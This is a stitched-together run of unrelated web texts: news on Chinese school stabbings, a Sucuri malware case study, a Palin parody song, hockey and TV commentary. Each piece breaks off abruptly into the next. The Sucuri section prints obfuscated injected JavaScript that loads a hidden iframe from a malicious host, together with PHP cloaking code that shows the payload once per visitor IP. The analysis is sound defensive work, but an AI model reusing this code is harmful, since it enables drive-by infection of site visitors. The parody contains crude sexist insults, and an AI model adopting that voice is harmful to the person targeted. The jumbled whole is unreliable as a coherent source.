Curiously , the four attacks in March and April mirror a series of assaults in August and September 2004 , in which students in four other schools and a day care center were attacked by knife - wielding men who stabbed dozens of children .
One theme echoed in some Internet postings was the feeling by many Chinese citizens that they had little power in the face of authority , and few ways to right wrongs .
One posting compared the attacks to a notorious rampage in July 2008 by a man who said he felt he had been wronged by the police .
In a single attack in Shanghai , the man , Yang Jia , stabbed six police officers to death — and he became a national hero by the time he was executed that November .
Image Zheng Minsheng was sentenced to death in the March 23 killings of eight children in Fujian Province .
The attack was the first of four recent ones .
Credit ... China Daily , via Reuters
One person who posted in a chat room pointed out that after the attack in March , a student wrote a letter to the assailant , saying , “ If you ’ve got hatred , please go to kill the corrupted official . ”
0 SHARES Facebook Twitter
We deal with web - based malware every day here at Sucuri .
Most of them are very simple and easy to detect , but once in a while we face some that are very complex and targeted .
This case study is about the later , a targeted attack against a high profile site .
Hope you like it .
A few weeks ago a client reported that his site was being flagged as having malware by an anti virus product .
He was n’t able to see it and even the users who complained to him about it , said that they only got the warning once and never more , so they were n’t sure if it was a false positive or not .
We did a little analysis and only one Anti Virus ( Avast ) flagged the file http://site.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js as having malware .
We re-run the scanner again and it said the file was clean .
Weird …
We manually looked at this mootools .
v1.11.js and it looked clean to us .
Time for a more complete investigation .
Discovering the problem
We went to our analysis system and we noticed that for the first time you visit the file http://site.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js it would return malware on the top of it .
After that , the file would return clean .
This is what was added to the top of the file :
if(document.cookie.indexOf('urchin') ==-1 &&
!window.navigator.userAgent.toLowerCase( ).match(/(indexer|googlebot|msnbot|bing|ask ) / ) )
{ res=new Date( ) ;res.setTime(res.getTime ( ) +80000000 ) ;document.cookie='urchin= '+escape ( ' google -
analytics.com ')+'; expires='+res.toGMTString ( ) +'; path=/'; function mOG ( ) {}; var tO=40844 ;
m OG. prototype = {i : function ( ) {var v= '' ; var iA=function ( ) {return 'iA'} ; return 'h6tMt6 pT:M/T
..
/QiMmEgTdToTwMnElTo6aTdMsQ.Qc6oMmM/6iMnQ.McQgTiM?M4T'.iO(/[ TEQM6 ]/g , '' ) ; var vL=function ( )
..
dK='d K '; }zM=41990 ;var wE=function ( ) {}; var xW=57051;}} ; this .sA= '' ; var rK=new mOG ( ) ; var tQ='tQ ' ;
rK.t( ) ; var cE=new Array ( ) ;}
This is this script a little more organized :
So basically this malware will only be displayed if the user agent is not from a crawler ( probably to avoid that the site get blacklisted or that it shows up on the search results ) .
After all the obfuscation this is what it does :
CreateElement iframe setAttribute src =
http://imgdownloads.com/in.cgi?4
So it creates a new iframe that points to imgdownloads.com ( a site that is already blacklisted ) .
Internal analysis – What is happening
After we discovered what the malware was doing , we went to analyze his files to see what was happening .
First , we discovered a directory at /www.site.com.com/web/cgi-bin/mt-bak/ with a list of IP addresses that were accessing the site each day .
ls -la /www.site.com.com/web/cgi-bin/mt-bak/
100405.txt
100404.txt
100403.txt
..
cat /www.site.com.com/web/cgi-bin/mt-bak/100405.txt
x.78.231.202
x.64.183.67
x.14.192.1
x.166.39.66
x.158.1.162
x.145.64.64
x.218.178.206
x.141.14.3
x.1.84.124
..
Interesting , so that ’s probably how it was tracking the IP addresses and deciding when to show the malware .
We also , discovered an encoded PHP file ( xml.php ) with the following code :
< ?php $ v1 = strrev( ' edoced_46esab ' ) ; $ v2 = strrev( ' etalfnizg ' ) ; eval ($ v2($v1('nVdZk6JYFn7O/BUZFRWRWVFTKYuUSXTkzKgIgorKKvRMVMAFUbkslWAKdPR..
/n8OiaVZV98M8GHK3c76zfffc29uPnpP7d8939d/DhzLyPnz67fZjtoWp+14U573ceQn8nKB79 ..
/9ZNjjPws2abOPn5ESdQ7+W4PJXHuw6FT+uX8meJjsI
Decoding the file , this is what it does :
$ date = date ( " ymd " ) ;
$ sf = '/www.site.com/web/content/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js';
$ mrd = trim ( file_get_contents ( $sf ) ) ;
$ cpasswd=@$_COOKIE [ 'urchins ' ] ;
$ logfile= " /www.site.com/web/cgi-bin/mt-bak/$date.txt " ;
$ add = base64_decode ( 'aWYo5tYXR8Y3Jhd2xlcnx5YWhvb3xzZWFyY2h8c3RhY2tyYW1ibGVyfGFwb.. ' ) ;
$ip1 = $ _SERVER [ ' REMOTE_ADDR ' ] ;
$ lo = file ( $ logfile ) ;
$ skip = false ;
foreach ( $lo as $ ip2 )
{
if ( trim ( $ip2 ) == $ ip1 )
{
$ skip = true ;
break ;
}
}
if ( $ skip == false )
{
$ fp = fopen ( $ logfile , " a " ) ;
fwrite ( $fp , " $ip1n " ) ;
fclose ( $fp ) ;
//$mrd .= " n " .$add ;
echo $ add . " n" .$ mrd ;
}
else { echo $ mrd ; }
BINGO !
That ’s the file that is being called to decide when to show the malware .
It reads the user IP address and if is not presence in the mt - bak directory , it shows the malware and adds it in there .
Once we knew what was happening , it was easy to isolate which file was calling the xml.php to fix the problem .
We did n’t have logs to know when this happened , but we had to find out how they got in to make sure it did n’t happen again .
We took their web directory to see if we could find anything else there and also looked at the differences between a clean install of WordPress and theirs .
By doing that , we found a new file hidden inside the wp- includes directory : class-rss.php :
It was understandable that tempers should have been frayed at the heart of Government in May : it saw the publication of The Daily Telegraph 's highly damaging expenses files .
July , too , was a difficult month for Brown with his much - ridiculed pledge in the Commons to bring in a " zero percent increase " in public spending and Lord Malloch - Brown 's resignation from the Government .
If the PM's big , clunking fist was to blame for the busted keyboards in those months , it seemed more stilled in the three months to February this year when only five new keyboards were required during each of these months .
This coincided with Brown 's Lazarus - like revival in the polls .
The full keyboard casualty list is as follows : March – ten ; April – ten ; May – 12 ; June – eight ; July – 12 ; August – eight ;
Sept – eight ;
Oct – eight ;
Nov – nine ; Dec – five ; Jan – five ; Feb – five .
David Beckham can't fix this , nor can Time person of the century Ronnie O'Brien - it's MLS [ youtube ] ] - via boards.ie
Advertisement
JeanS is well known to followers of climate blogs , being a regular commenter and occasional author at Climate Audit .
After Leo Hickman 's piece the other day criticising anonymous posters , I asked Jean ( not his real name ) , who is a professional statistician , whether he'd like to say something about his desire as a practising scientist to remain anonymous when contributing to blogs .
The following has been lightly edited for language .
... being anonymous is deliberate decision I made after long consideration when I started actively commenting on climate - related blogs .
The main reason is that I want to keep my real career out of this .
I 'm in the academic world , and unlike the US , we do not have a tenure system .
People are only human , and anything , even a small thing , that can be used against you might be used , even if it does not have anything to do with the actual topic .
That is , I see that using my real name would present some risks to my academic career but I can hardly imagine any situation where it might be helpful .
Also , whatever I 've been doing , it 's been merely a " hobby " for me .
I have not really planned to publish anything on topic .
I 've been contacted by a few people proposing some work related to climate research but I 've declined .
Simply by doing that , it would then be more than a " hobby " .
Also for this reason I have , for instance , explicitly said a couple of times to Steve that , whatever I " publish " on CA , he can use in a publication etc. as if it were his own discovery .
The way I see it is that the work done by " anonymous people " over at CA is community work done on Steve 's premises , and if someone needs to be credited for it , it is Steve .
In my opinion , if a person wants to have " proper " credit , she / he should use the real name when commenting / posting .
Being anonymous also gives me something I wo n't have once I start using my real name : freedom to stop commenting whenever I wish , if I , e.g. , get bored / too busy with real life etc .
Once your name is out , it is like a stain , in good and bad , that follows you rest of your life .
Also , related to Hickman 's piece , I do not understand his search for " motives and vested interest " related to anonymity .
What would he gain knowing my name ?
Nothing .
The only insight into " my motives " is to read what I 've been writing under the name " Jean S " .
This is the same for Hickman himself : the only thing I can figure out about him is to read what he 's been writing .
It would not make any difference if all of his articles had been posted under a pseudonym - they might be , how would I know ?
It is all about the credibility , or lack of it , you build by your own writings , nothing else .
It should be enough for Hickman , for instance in my case , to know that e.g .
Steve , Judith Curry , Eduardo Zorita , and Roman Mureika do know my true identity , and they still communicate with me .
Actually , in my opinion , when having more scientificly oriented discussions like those once in a while at CA , it is better that people are commenting under pseudonyms .
This way the emphasis goes onto what has been said , not onto who is saying it .
This is exactly the same reason why the peer review process ideally is anonymous .
Although Fox News will report that attendance was in the millions , the actual head count for Sarah Palin ’s Tea -Bagger rally on Boston Common today was approximately 1000 ( including protesters ) .
Let ’s put that in perspective .
The population of metropolitan Boston is 4.5 million and only 1000 bothered to see Sarah Palin on a bright sunny Spring day with temperatures in the mid sixties .
More people than that show up on a daily basis at Boston Common to watch a squirrel and a pigeon fight over a discarded pretzel .
The television coverage of NECN embarrassingly showed a lot more green grass than human beings on the Common .
Palin protesters were present .
Many were sporting signs which said , “ Health Care Reform .
No Thanks To Palin ” .
Another read , “ Hey Sarah , Family Values = 30 Million Newly Insured Americans ” .
We will update with more on the protest signs as we learn more .
One of the Tea -Baggers held a sign which said , “ Remember When Dissent Was Patriotic ? ” , only it was misspelled as “ Dessent ” .
How appropriate and predictable .
Palin was dressed in a red leather jacket with a flag button ( as usual ) .
She said that husband Todd was with her and that he liked this type of tea party more than the ones he was forced to attend with other first ladies when he was the “ First Dude ” .
The former ex-quitting governor of Alaska spoke only for about 20 minutes .
It was the usual nonsense drivel in which she criticized the current administration without offering even one single alternative policy initiative .
She claimed that “ radical ” changes like the health care reform law and student loan reforms have alienated our allies .
Huh ?
She uttered her tiresome refrain that “ Bostonians , like the rest of America will continue to cling to our Constitution , our guns and our religion ” .
Of course , Palin did not realize that Massachusetts favors and harbors some of the most strict gun laws in the nation .
Sarah Palin needs to do some homework about the venues where she speaks .
Next , she said that “ the government works for the people , not the other way around ” .
Perhaps she should ask the millions of federal , state and municipal employees about that doozy .
In rapid succession she then said , “ nu - cue - ler ” “ drill baby , drill ” and “ Ya betcha ” .
The best part of her speech was that the amplifiers cut out repeatedly such that most of the small crowd could not hear a word that she spoke .
The rally was scheduled to last until 1:00 pm but the crowd was gone by 11:25 am .
At one point , Ms. Quittypants attempted to rev up the quiet gathering by claiming that she had a personal connection to Boston .
She claimed to have been on a youth hockey trip here when she met 1980 Olympic hockey captain and champion , Mike Eruzione .
Problem is , Palin forgot his first name and completely mispronounced his last name .
Of course Mike Eruzione ( the good Democrat that he is ) was not present at the rally .
Then again , neither was newly elected nudist Republican Senator Scott Brown , Republican gubernatorial candidate Charles Baker or Republican congressional candidate Jeffrey Perry .
The Massachusetts Republican candidates ( few that there are ) realize that Sarah Palin and her violent yet silly rhetoric is toxic to their election chances .
Sarah Palin was introduced to the tiny audience by local uber - conservative talk radio host and columnist for the Boston Herald ( Enquirer ) .
Michael Graham .
Graham airs his acerbic daily radio show on Boston ’s WTKK ( affectionately known as WKKK as the result of its almost entirely right wing lineup ) .
It is interesting to note that Graham drew criticism from blogs on the Left and the Right for comments about Bill and Hillary Clinton made on CNN Headline News ’ Glenn Beck Show on June 20 , 2007 .
Referring to a Clinton campaign ad based on the final episode of The Sopranos , Graham said “ … did n’t you at some point want to see , like , Paulie Walnuts , somebody come in here and just whack them both right there ?
Would n’t that have been great ?
… Come on !
Where ’s “ Big Pussy ” ?
Come on !
Let ’s make it happen … I wanted that . ”
Graham adores and advocates gun violence as much as his hero Sarah Palin .
Thankfully , the response to this version of the Boston Tea Party was tepid .
In honor of the troops , please remember to click on the song link below to familiarize yourselves with the tune and to have more fun singing along with today ’s song parody .
American
Pie song link : http://www.youtube.com/watch?v=uAsV5-Hv-7U
ALASKAN PIE
( sung to the Don McLean song “ American Pie ” )
A long , long time ago …
I can still remember
Palin ’s slutty flight attendant style
And when she blew her only chance
With John McCain in the Big Dance
In light of the pregnancy of her child
In February she did shiver
When Levi sold her down the river
Bad news at her doorstep
She did n’t have no more pep
The allegations she denied
Of all those gifts that she did hide
She took Alaskans for a ride
As she cajoled and lied
So bye - bye Miss Alaska bye - bye
You were shady and darn lazy
With a crazy beehive
And your background boys were making turkey head pie
Then you quit on the third day of July
Quit on the third day of July
Did you quit the job you love
After talking with God up above ?
Did the good Lord tell you so ?
Are you still pals with Plumber Joe ?
Do dead fish still go with the flow ?
And can Todd ’s sister score me some good blow ?
Well you know that your prospects are grim
’ cause you ’re way way out there on a limb
You ’re sure to have the blues
Man , you screwed up those interviews
You ’re just a lonely mid-aged “ hockey mom ”
With real deep frustration and a man that ’s dumb
You ’re just a third rate school alum
Today your future died
We started singing
Bye - bye Miss Alaska bye - bye
You were shady and darn lazy
With a crazy beehive
And your background boys were making turkey head pie
Then you quit on the third day of July
Quit on the third day of July
Now for two years all you did was drone
Remember Sarkozy on the phone ?
But just what will your future be ?
Will you pester us like a has been queen ?
Will you pout and whine like a spoiled teen ?
In a voice that sounds so shrill and mean ,
Oh , and when you leave Wasilla town
Take along your beauty pageant crown
And bridges that you burned
Oh , please never return
And those hits you took will leave some marks
A “ Barracuda ” is no shark
And you were always in the dark
Today your future died
We were singing
Bye - bye Miss Alaska bye - bye
You were shady and darn lazy
With a crazy beehive
And your background boys were making turkey head pie
Then you quit on the third day of July
Quit on the third day of July
Helter skelter you are sure to swelter
The ice in your veins may even melt - ah
Ethics problems coming fast
You ’re landing hard on your ass
No throwing stones in a house of glass
When you ’re starring in a demon cleansing mass
Now your thinning hair reeks with perfume
You ’re a spaceman cuz you see the moon
Your fans would shout and dance
Oh , to your “ drill baby drill ” chants !
Katie Couric made you squirm and squeal
And that was when your fate was sealed
Do you recall what was revealed
The day your future died ?
We started singing
Bye - bye Miss Alaska bye - bye
You were shady and darn lazy
With a crazy beehive
And your background boys were making turkey head pie
Then you quit on the third day of July
Quit on the third day of July
Oh , and then that look upon your face
Not knowing a Supreme Court case
Forget about the Bush Doctrine
So come on : jack be nimble , jack be quick
Sarah Palin’s no “ Maverick ”
Cuz she ’s just a “ Barbie ” to Todd ’s “ Ken ”
As we watched you on that debate stage
Your hands were clenched in fists of rage
Everyone then could tell
You were praying for the bell
And as you hoped that you could land a right ,
To salvage something of the night
We saw Biden laughing with delight
That day your future died
Joe was singing
Bye - bye Miss Alaska bye - bye
You were shady and darn lazy
With a crazy beehive
And your background boys were making turkey head pie
Then you quit on the third day of July
Quit on the third day of July
Palin ’s a girl who has the blues
And she cannot handle interviews
She quit her job and walked away
She could not take it any more
She hightailed it right out the door
Just like a scared child , she up and ran away
And in the streets the voters beamed ,
The good Lord had fulfilled their dreams
Sherry Johnston was tokin ’
The “ barracuda ” broken
We did not really want to boast
But “ Mama Bear ” was finally toast
She ’ll write about it through her ghost
That day her future died .
And we were singing
Bye - bye Miss Alaska bye - bye
You were shady and darn lazy
With a crazy beehive
And your background boys were making turkey head pie
Then you quit on the third day of July
Quit on the third day of July
We were singing
Bye - bye Miss Alaska bye - bye
You were shady and darn lazy
With a crazy beehive
And your background boys were making turkey head pie
Then you quit on the third day of July
Quit on the third day of July
BISHKEK , Kyrgyzstan —
Shortly before the uprising in Kyrgyzstan two weeks ago , online news sites posted a series of hard - hitting exposés accusing the family of President Kurmanbek Bakiyev of skimming money from the public coffers , an allegation that touched a nerve in this poor country and galvanized opposition to his government .
When the authorities responded by blocking the Web sites on local servers , complaints came in from the usual places — the Committee to Protect Journalists and Freedom House — but also from an unlikely advocate for free media in the wired world : the Russian Foreign Ministry .
Rather than a change of heart on press freedoms , still stifled at home , Russia ’s stance in Kyrgyzstan appeared to be a new tactic in dealing with the former Soviet republics it regards as within its sphere of influence .
Backing freedom of expression — in this case to oppose a leader with whom it was unhappy — was just one element of a wider , behind - the - scenes role in the uprising that may help Russia win influence in the new government .
Russia and the United States have been dueling for the upper hand in this small but strategically important Central Asian country , where the United States maintains an air field outside the capital as a logistics and refueling hub for the war in Afghanistan .
When incurring a first loss , some fighters may see reason to make major changes in the way they approach future fights .
For Ultimate Fighting Championship heavyweight Yorgan De Castro , his adjustments center around cutting the fat , literally .
Holy Mackerel !
This IS truly unbelievable !
Where has this guy testified as a forensic expert ?
Can you say mistrial ?
Is it too late to have the NYPD revoke his pension ?
If video does not load use manual links :
CLICK HERE or CLICK HERE
Tantalizing Explanation :
CNN
February 24 , 2010
Forensic expert Dan Austin speaks with In Session Host Ryan Smith about the weapon that was used to kill Amy Boscarino .
Moderate Wine Drinking Reduces your Tummy Pouch !
Note :
This is the sort of study I * love* to read about .
A recent study at the University of Buffalo found that drinking moderate amounts of wine reduced your levels of abdominal fat .
Those who abstained , and those who binge drank , both had more ' tummy pouch ' than those who drank healthy amounts of wine each day .
The fat in particular the study was testing is called " central adiposity " and is in essence abdominal fat - the tummy pouch .
If you lie on your back , this is the tummy fat that sticks upwards and does n't slide to one side or another .
The study was done on 2,343 adults in all age ranges , both male and female .
The results held for all of the groups .
People who drank one or two glasses of wine a day had the smallest belly fat amounts .
Those who binge drank ( 3 - 4 glasses at a time ) or who did n't drink at all had the pouch .
Note that those who drank hard alcohol had larger amounts of belly fat across the board .
So it 's a glass of wine for your health !
A great deal of research and work went into my wine / health pages .
If you use this information , please credit me properly .
Thanks !
All content on the WineIntro website is personally written by author and wine enthusiast Lisa Shea .
WineIntro explores the delicious variety and beautiful history which makes up our world of wine !
Lisa loves supporting local wineries and encouraging people to drink whatever they like .
We all have different taste buds , and that makes our world wonderful .
Always drink responsibly .
Lost blasts into its final season larded with long - gestating story arcs outlined years ago when producers created the show 's " bible . "
The ABC series , which begins its final 16 - episode run with a two - hour season premiere Tuesday ( 9 p.m. EST ) , ended the previous season in a white - light blast detonated by time - traveling Juliet ( played by Elizabeth Mitchell ) .
Producers declared earlier this month that the 16 remaining episodes of Lost will inevitably leave some mysteries unresolved , given the sheer quantity of clues , red herrings , subplots and weird moments sprinkled throughout the series since its 2004 launch .
But some issues remain paramount .
Culled from the blizzard of riddles raised by the Lost ... and Gone Forever blog and Lost Ate My Life author Jon " DocArzt " Lachonis , here are seven questions Lost needs to answer over the next four months .
7 burning questions for Lost 's final season — — — — — — — — — — — —— —-
Just because Juliet threw herself on top of a nuclear device does n't mean her life is over :
This is Lost after all .
Is Juliet dead or alive ?
Will the explosion hurl survivors into a new dimension where their Oceanic Flight 815 lands safely in Los Angeles so they can go about their business as strangers with no memory of the island ?
Alternately , will the explosion catapult our heroes into the present day and make all that Season 5 time travel a water - treading storyline detour ?
Did a greater power or mere coincidence bring the survivors to the island in the first place ?
Do the Oceanic 815 survivors share special traits that link their destinies , or did they simply get lucky by living through the plane crash ?
What 's the deal with that creepy plume of smoke introduced in the pilot episode ?
" Smokey " recurs throughout the series , but this mostly malevolent force remains a mystery as to origins and motivation .
The ever - twisted manipulator Ben ( played by Michael Emerson ) has an agenda , but it keeps changing .
Is he a pawn or the prime mover who only pretends to be following orders ?
Will Kate ( Evangeline Lilly ) end up with Sawyer ( Josh Holloway ) or Jack ?
Or neither ?
Will the guy who looks like John Locke ( Terry O'Quinn ) , who overcome the mysterious Jacob , explain what the hell he 's trying to accomplish ?
Or will he be sidelined as Jack , Ben and the Others fight their way through to some kind of closure ?
Blowback — — –
What questions do you think Lost absolutely must answer this season ?
And , after seeing the Lost season premiere , weigh in with your take :
What 's the biggest surprise of the opener ?
Did the final season 's first volley raise more questions than it answered ?
Comment below .
See Also :
Remote control Lego Technic Bugatti Veryon – Click above to watch video after the jump
Someone going by the handle " Sheepo " spent who knows how many hours satisfying the urge to build a Bugatti Veyron out of Lego Technic pieces .
Among its many features are a remote controlled braking system , power targa roof and motorized rear spoiler .
And then there 's that working seven - speed sequential gearbox – even the gear lever moves – plus reverse .
If it goes 254 miles per hour to scale , we 'll be even more impressed .
And to any of you with this much time on your hands and dreams in your head , keep up the good work .
Follow the jump to see it in action .
Hat tip to Cameron !
[ Source : YouTube
Susan Faludi ,
Stiffed : The Betrayal of the American Man
( William Morrow Co. , 1999 )
In this ground - breaking sudy of the contemporary " male crisis , " award - winning journalist and author Susan Faludi cements her reputation first gained in Backlash ( 1991 ) , as a most astute analyst of gender relations .
Her goal is to find out why men in today 's USA are unhappy , angry , bewildered and all too often violent .
The author skewers conventional wisdom that suggests that either men must change their individual natures to overcome this crisis or that men are the victims of the undeserving , scheming feminists , affirmative action proponents and job - grabbing illegal aliens .
Faludi arrives at a different conclusion by dint of spending time with men -- laid - off industrial workers , bewildered Vietnam vets , sports fans , media executives , Promise Keepers , porn stars , ex-cons , movie stars and others -- chronicling their thoughts , aspirations , explanations and exasperations , finding that men are not to blame for their current predicament , nor on the whole is some sinister other .
Rather , culture and society has betrayed American men of the post - World War II world , this being documented in meticulous detail with extensive notes and bibliography .
Faludi shows how men were taught by their fathers to assume inheritance of a world they would firmly control -- it turns out they do n't control it at all and there is an overwhelming sense of parental abandonment .
Meaningful work that both established and existed within a wider social purpose is gone for all but a few .
The virtues of trust and loyalty are now laughable anachronisms , all that is left of masculinity being an ornamental facade of what Faludi terms individual male " superdominance . "
The author depicts how we have changed fundamentally from a society that produced a culture to a culture rooted in no real society at all , global corporatism sweeping away institutions on which men felt some sense of belonging and replacing them with visual spectacles that they can only watch while constantly being bombarded by advertisements to buy consumer goods to fill the void .
Loss of economic authority , devaluation of loyalty , their fathers ' silence and the elevation of the ornamental as the standard of personal worth lie at the heart of men's discontent and men have not rebelled because no simple enemy is responsible .
But that , for Faludi , offers hope in a conclusion that men and women have an opportunity to move beyond an adversarial relationship to create change together , to create a new paradigm for human progress that will open doors for both sexes as they fight the dilemma of mutually being powerless in a modern , corporate - dominated society .
Stiffed is a major reassessment of what it is to be a man in modern America .
Lucidly and compassionately written , this is brilliant stuff , cutting through nonsense , allowing men to speak for themselves and taking from their words original and sympathetic insights .
Provocative , sure to stimulate important dialogues , Stiffed is , despite its monumental size , enthralling to read , brimming with edifying content -- essential reading for people of both sexes .
A Debate Fit for 2020
We did n’t really learn anything new in this 90 - minute shouting match , but there were some spectacularly cruel moments from our president .
Fixed not always decrypting a game on launch
Really fixed offline mode not always working
Fixed cases where a game would stop downloading for no reason
A Steam client update is now available .
To apply the update , click the File menu inside of Steam and then select " Check for Steam Client Updates ... " .
The specific changes include :
The 2009 - 10 Washington Capitals sold out every single home game , set a club record for points in a season ( 121 ) , and scored a league leading 313 goals , which was 45 more than the second place Vancouver Canucks .
However , after Washington was upset in the first round of the Stanley Cup Playoffs in seven games by the Montreal Canadiens there are people in the hockey world ( other teams employees , media , fans , etc. ) who insist the Caps need to change their style of play if they want to win the Stanley Cup .
Even more crazy is there are some who are calling for Caps Coach Bruce Boudreau to be fired after he just orchestrated the single greatest regular season in franchise history .
My reply to all of this talk is : STOP THE NONSENSE !
( which is a nicer way of saying , ala Mr. Hand from Fast Times at Ridgemont High , “ What are you people , on dope ??!! ” )
First off , the system works and it fits Washington ’s make - up , granted I will argue that some changes in personnel need to be made to make it work even better , but more on that later .
When Boudreau was hired the Caps stunk .
They were 6 - 14 - 1 and in last place in the Eastern Conference .
They had a bunch of young and highly skilled players but they were using an archaic system under former Coach Glen Hanlon .
Enter “ Gabby ” and suddenly the Caps are more aggressive , score goals , and are exciting to watch .
He also has led them to three straight Southeast Division titles and a third , second , and first place finish , respectively , in the Eastern Conference .
The first season fans were just happy to make the playoffs and the loss to Philadelphia in the first round in seven games was considered a good first step .
Then last season , Washington grew up and took eventual Stanley Cup Champion Pittsburgh to seven games in the second round before losing convincingly in the last tilt , 6 - 2 .
Naturally expectations were high for 2009 - 10 and the Capitals delivered in the regular season setting the marks mentioned in the opening above .
However , come playoff time , something happened on the way to the Forum and all of that firepower fizzled out , mostly due to a hot goalie but also due to some defencies on the Washington end .
After last night ’s loss , which can definitely be considered a post season step back , some have hit the panic button .
The easiest thing for critics of the Caps to point to are the comments from R.J. Umberger of Columbus that came after Washington beat the Blue Jackets , 3 - 2 , in a meaningless affair in Ohio on April 3rd .
Specifically Umberger said the following about the Caps :
“ I do n’t think any team in the West would be overmatched by them , ” Umberger said .
“ They play the wrong way .
They want to be moving all the time .
They float around in their zone , looking for breakaways and odd - man rushes .
A good defensive team is going to beat them ( in the playoffs ) .
If you eliminate your turnovers and keep them off the power play , they ’re going to get frustrated because they ’re in their zone a lot . ”
Naturally after the Caps were knocked off by Montreal , which on paper appears to be a defensive team , the Umberger quotes were thrown in their face and labeled as correct .
Ludicrous accusations , I say .
Umberger basically says all you need to do is keep the Caps off of the power play because they wo n’t be able to get out of their zone and that will allow you to beat them with defensive mistakes .
Well you do n’t have to be a prosecutor or attorney on Law & Order to see that Umberger ’s quote does not match what actually happened between the Caps and the Habs .
Montreal DID take penalties , in fact , Washington had 33 attempts in seven games , nearly five a tilt , but they only scored once in the entire series with a manpower advantage .
In addition , the puck spent very little time in Washington ’s zone , other than short stretches in the early minutes of several of the contests and the proof of that is the Caps outshot Montreal by a staggering 292-194 !
Those stats do not represent the work of a club that chooses to “ float in their own zone looking for breakaways . ”
The truth is the Caps dominated the play but lost due to an anemic power play , great goaltending by Halak , and the unwillingness of some Caps players to make the hard plays necessary to score goals .
Now that we have dispelled the Umberger myth let ’s get back to some of the other thoughts on the style of play .
Teams say because Washington is an offensive minded team that they ca n’t win the Stanley Cup .
To that I say , any of those people ever see the Edmonton Oilers of the 1980’s or the Pittsburgh Penguins of the early 1990 ’s or some of the Detroit Red Wings teams ’ that have won Stanley Cups in the last 15 years ?
We ’ll get to those teams in a minute but does anyone really think that taking the skilled players the Caps have and putting them in a system like what the New Jersey Devils play will work in the post lockout era ?
Sure New Jersey is good during the regular season but in the playoffs their trapping , defensive system has led to three straight first round defeats with arguably the greatest goalie of all time in net ( Martin Brodeur ) .
To see more proof that their system does not work look no further than the mid-season addition of Ilya Kovalchuk .
The highly skilled Russian , in the Devils defense first mantra , was supposed to be the final piece of the puzzle for New Jersey but he was unable to get Jacques Lemaire ’s club out of the first round .
So to think Washington should switch to a trapping , defensive system is pure hogwash .
That style does n’t work anymore .
The truth is , the Caps are playing the right system and post season setbacks will happen , especially to young teams like Washington has and despite what many people may be thinking today , this difficult experience is not all bad .
Reference the 1981 - 82 Edmonton Oilers .
This Wayne Gretzky led club , after being knocked out in the first round in their initial playoff appearance in 1979 - 80 and then defeated in round two in the post season in 1980 - 81 , set the league on fire scoring an NHL record 417 goals !
The Oilers notched 111 points and won their division , over the Vancouver Canucks , by 34 points ( sound familiar ? ) but somehow got bounced in a best of five series by a Los Angeles Kings club that only amassed 63 points in the regular season .
Wow , I guess breaking up Edmonton and changing their system , one that reflected the then clutch and grab ..er Stanley Cup Champion New York Islanders were employing in that era was what should have happened next , right ?
But no , Edmonton Coach Glen Sather stayed the course , made some minor personnel tweaks ( added forward Ken Linesman from Philadelphia ) , and in 1982 - 83 they went to the Finals only to lose to the Islanders .
But in 1984 and 1985 they were Stanley Cup Champions and in 1987 and 1988 they did that again .
I know people were all over Sather , Gretzky , Messier and company after the Kings debacle but the Edmonton brain trust knew what they had and did n’t panic .
They simply allowed the young players they had to mature and one of the lessons learned was realizing the price that needed to be paid to win in the post season .
This is similar to what the Red Wings went through during the 1990 ’s before they finally broke through and won back to back Cups in 1997 and 1998 .
I vividly remember the Red Wings being labeled as the typical Presidents ’
Trophy team that could not get it together in the playoffs , much like the monikor the San Jose Sharks are wearing in current times .
If you look at the personnel on that 81 - 82 Oilers team the names Gretzky and Mark Messier jump out first .
The two great centers were flanked by pure goal scorers Glenn Anderson and Jari Kurri .
They were also led on the blue line by a fast skating , offensive minded defenseman named Paul Coffey , who took a lot of heat in his career for his play in his own zone .
In goal they had a young and acrobatic Grant Fuhr and they had a super solid Kevin Lowe on the back end who focused on defense first .
Circling back to Washington , I see a lot of similarities in the 2009 - 10 Capitals with the 1981 - 82 Oilers , although that Edmonton team was clearly deeper up the middle and on the back end .
The Alex Ovechkin - Nicklas Backstrom combination is not Gretzky - Messier but it is n’t way off the map as far as top ranked players in the league at the time are concerned , except that the Great # 8 plays left wing .
Two time Norris Trophy finalist Mike Green can be compared to # 77 and in 81 - 82 , Coffey only had a goal and an assist in five post season tilts before figuring out how to play in the Stanley Cup playoffs and recording seven goals and seven assists in the Oilers run to the finals in 82 - 83 .
Fuhr was a phenomenal goalie but he was lit up in five games going 2 - 3 with a 5.05 GAA in 81 - 82 but in their Cup run in 1983 - 84 he kept the GAA down to 2.99 .
Varlamov certainly has the ability of a young Fuhr .
Anderson was a great skater and could fill the net and the closest comparison would be Mike Knuble , although # 22 has nowhere near the speed that # 9 had .
Now the similarities start to get a little dicey , Kurri was a pure goal scorer who could play defense .
Semin is the closest Capital in skill and ability but from what I have seen from # 28 he has nowhere near the drive to be like # 17 at both ends of the rink .
Washington also does n’t really have a Lowe type d-man right now .
Would it be Tom Poti ?
Jeff Schultz ?
or perhaps could it be Karl Alzner ?
Big stretch on that front , if you ask me .
Clearly that Edmonton squad was great and they managed to learn from that first round knock out in their third playoff season .
But Washington has a talent base that is somewhat comparable and the teams play very similar styles .
With the post lockout rules , the game has become much more like the mid-eighties with the notable exception being the ability of the goalies and the increased size of their equipment .
A Capitals style of hockey works , if Boudreau and GM George McPhee have the right players that execute the system .
Execution was clearly lacking against Montreal .
Some players were not physical enough ( see Tomas Fleischmann ) to handle the demands of the high energy system while others just do n’t seem to have the speed or size to punish opponents on the backend .
This team will improve based on maturity and experience alone , but to take it to the next level some pieces of the puzzle need to be found .
First and foremost is a second line center .
Boudreau said himself that secondary scoring was what was missing from his club in 2010 .
Would a better center help Semin get going ?
Probably not , # 28 still performed in the same soft manner when paired with Backstrom in game six , but if you brought in a real # 2 pivot man then a Brooks Laich or an Eric Fehr likely pots more tallies in the post season .
Based on this , Semin is disposable , especially if he fails to compete like he did for much of the Montreal series .
The defense could use some tweaks in addition to the permanent promotions of Alzner and John Carlson .
Specifically the blue line could use a guy who is physical in his own end , can wear smaller opponents out , and block shots .
In summary , the disappointment from 2009 - 10 is very high right now , but to do something drastic like changing the system or firing the coach makes zero sense .
These guys are not going to become the 1995 or 2002 - 03 New Jersey Devils nor do the current rules dictate that type of system will work .
An offensive team that is willing to pay the price at both ends of the rink is what has won the last two Stanley Cups and will likely take it again this year .
Washington just needs to mature as a team and realize that from puck drop they need to be ready .
They clearly were not this post season .
Finally , McPhee must fill some of the final holes on his roster , with a focus on finding another line that can score when it counts .
